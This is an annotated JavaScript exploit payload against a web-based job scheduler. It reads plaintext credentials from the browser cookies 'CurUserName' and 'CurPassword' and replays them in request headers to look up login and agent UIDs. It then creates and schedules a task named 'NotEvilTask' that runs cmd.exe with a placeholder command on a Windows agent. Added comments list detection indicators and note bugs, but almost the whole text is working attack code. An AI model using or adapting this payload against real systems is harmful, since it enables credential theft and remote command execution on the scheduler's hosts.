// Script prologue: announce start, capture the current date (used further
// down to build the schedule date string), and name the two browser cookies
// from which the credentials replayed in later request headers are read.
console.log('Starting Payload..');
var d = new Date();
// Implicit globals (no var/let/const) holding the cookie names read below.
userCookie = 'CurUserName';
pwdCookie= 'CurPassword';
// NOTE(review): this top-level `ca` is never referenced again; readCookie()
// below declares its own local of the same name.
var ca = document.cookie.split(';');
/**
 * Look up a cookie value by name in document.cookie.
 *
 * document.cookie is split on ';', leading U+0020 spaces are stripped from
 * each `name=value` pair, and the first pair that starts with `name=` wins.
 * The value is returned raw (not URL-decoded).
 *
 * @param {string} name - cookie name; matched as the prefix `name=`
 * @returns {string|null} the raw value, or null when no such cookie exists
 */
function readCookie(name) {
  const prefix = name + '=';
  const pairs = document.cookie.split(';');
  for (let pair of pairs) {
    // Only plain spaces are trimmed, as in the original loop (not tabs).
    while (pair.charAt(0) === ' ') {
      pair = pair.substring(1);
    }
    if (pair.startsWith(prefix)) {
      return pair.substring(prefix.length);
    }
  }
  return null;
}
/**
 * Build a random string from the uppercase alphabet A–Z and digits 0–9.
 *
 * Uses Math.random(), which is not cryptographically secure, so the output
 * is only a disposable tag and must not be treated as a secret.
 *
 * @param {number} length - number of characters to produce; values <= 0 or
 *   NaN yield the empty string, and a fractional length rounds up
 * @returns {string} the generated string
 */
function makeid(length) {
  const alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  const pickOne = () => alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  let out = '';
  let remaining = length;
  while (remaining > 0) {
    out += pickOne();
    remaining -= 1;
  }
  return out;
}
/**
 * Debounced scheduler. Runs `callback` after `ms` milliseconds, cancelling
 * any callback previously scheduled through `delay` that has not fired yet,
 * so at most one timer is pending at a time.
 *
 * @type {(callback: Function, ms: number) => void}
 */
var delay = (() => {
  let pending = 0;
  return (callback, ms) => {
    clearTimeout(pending);
    pending = setTimeout(callback, ms);
  };
})();
// Credentials are taken directly from the two cookies named above and stored
// in implicit globals; only the username is URL-decoded. readCookie() returns
// null for a missing cookie, which decodeURIComponent turns into the string
// "null" rather than failing.
username = decodeURIComponent(readCookie(userCookie));
passwd = readCookie(pwdCookie);
// Plaintext credentials are echoed to the console here.
console.log(username + '/' + passwd);
// Get OS Login UID
// Request 1 of 4: a synchronous XHR (third `open` argument is false) to the
// <USERS_METHOD>/<USERS_HOST> placeholders. The cookie-derived credentials
// are sent in custom `login` / `password` request headers. Detection-relevant
// constants visible here: the fixed `zUID` prefix followed by 12 makeid()
// characters, the static Firefox 78 User-Agent, and the custom header names.
console.log('[+] Grabbing Login IDs');
var req = new XMLHttpRequest();
req.open('<USERS_METHOD>', '<USERS_HOST>', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send();
// The body is assumed to be JSON with a non-empty `items` array; any other
// shape (error page, empty array) throws here, as there is no error handling.
var responseData = JSON.parse(req.responseText);
var loginName = responseData.items[0].name;
var loginUID = responseData.items[0].uid; // Grab OS Login UID
console.log('[+] OS Login UID Found: ' + loginUID);
// Get Agent UID
// Request 2 of 4: same synchronous XHR pattern and the same header set as
// the login lookup, aimed at the <AGENTS_METHOD>/<AGENTS_HOST> placeholders.
// `req` and `responseData` are re-declared with `var`, so they simply
// overwrite the previous request's values.
console.log('[+] Grabbing Agent IDs');
var req = new XMLHttpRequest();
req.open('<AGENTS_METHOD>', '<AGENTS_HOST>', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send();
// Only the first returned item is used; again no check that `items` exists.
var responseData = JSON.parse(req.responseText);
var agentName = responseData.items[0].name;
var agentUID = responseData.items[0].uid; // Grab OS Login UID
// NOTE(review): this log line prints loginUID, not agentUID, despite its text.
console.log('[+] Agent UID and Name Found: ' + loginUID + ' ' + agentName);
// Create Task Definition
// Request 3 of 4: creates a task definition via <CREATE_METHOD>/<CREATE_HOST>.
// The JSON body is assembled by string concatenation, so agentName, agentUID,
// loginName, loginUID, cmd and the makeid() value are inserted without any
// escaping; a quote or backslash in any of them alters the document.
// From a defender's view the artifact to look for is a definition named
// "NotEvilTask" of subType TASK_SYSCMD whose command is cmd.exe with
// startDir C:/windows/system32, created in the "Definitions" folder (id 2).
console.log('[+] Executing Task Creation');
// `response` is declared but never used in this script.
var response = '';
var cmd = '<COMMAND_PAYLOAD>';
var req = new XMLHttpRequest();
req.open('<CREATE_METHOD>', '<CREATE_HOST>', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send('{"id":0,"name":"NotEvilTask","uid":"' + makeid(12) + '","enabled":true,"description":"","type":"TASK","subType":"TASK_SYSCMD","agent":{"type":"REMOTE","id":1,"name":"' + agentName + '","uid":"' + agentUID + '"},"attributes":{"exitCodes":"0","isCommandScript":false,"command":"cmd.exe","parameters":"' + cmd + '","startDir":"C:/windows/system32","loadProfile":true},"folder":{"id":2,"name":"Definitions"},"simulate":{"simulateTaskRun":false,"duration":0},"login":{"name":"' + loginName + '","uid":"' + loginUID + '","id":12},"output":{"return":false,"interleave":false,"accumulate":false,"readFromFile":false,"filename":"","format":"","amountType":"","amount":0,"xslStyleSheet":"","stdoutToFile":false,"stdoutAppend":false,"stdoutFilename":"","stderrToFile":false,"stderrAppend":false,"stderrFilename":""},"variables":[],"resources":[],"actions":[]}');
// "Success" is logged before the response is inspected; the HTTP status is
// never checked.
console.log('[+] Success');
var responseData = JSON.parse(req.responseText);
console.log('Data: ' + JSON.stringify(responseData,null,2));
// The server-assigned definition id is read from `definition.id` and reused
// in the schedule URL below.
var taskID = responseData.definition.id; // Grab gen ID
console.log('[+] Grabbed ID: ' + taskID);
// Execute Task
// Request 4 of 4: schedules the definition created above. The request path
// `/oc_main/zenaweb/definitions/<taskID>/operation?operation=schedule` on
// <EXEC_HOST> is the most specific server-side indicator in this script.
console.log('[+] Executing Task');
var req = new XMLHttpRequest();
req.open('<EXEC_METHOD>', '<EXEC_HOST>' + '/oc_main/zenaweb/definitions/' + taskID + '/operation?operation=schedule', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
// The send is deferred by 3 s through delay(); the year is hard-coded as
// "2022" while month and day come from `d`, and schedTime is fixed at
// 01.01.01 (zero-padded month/day via the ('0' + n).slice(-2) idiom).
delay(function(){
req.send('{"schedDate":"' + '2022' + '.' + ('0' + (d.getMonth() + 1)).slice(-2) + '.' + ('0' + d.getDate()).slice(-2) + '","schedTime":"' + '01' + '.' + '01' + '.' + '01' + '","startOnHold":false,"perpetual":false,"skipTriggers":null}');
}, 3000 ); // end delay
// NOTE(review): responseText is read synchronously here, before the deferred
// send above has fired, so at this point the request has not completed; the
// parse below presumably operates on an empty response. The timer is not
// cancelled by anything that happens afterwards.
var responseData = JSON.parse(req.responseText);
console.log('Data: ' + JSON.stringify(responseData,null,2));
console.log('[+] Task Executed Successfully');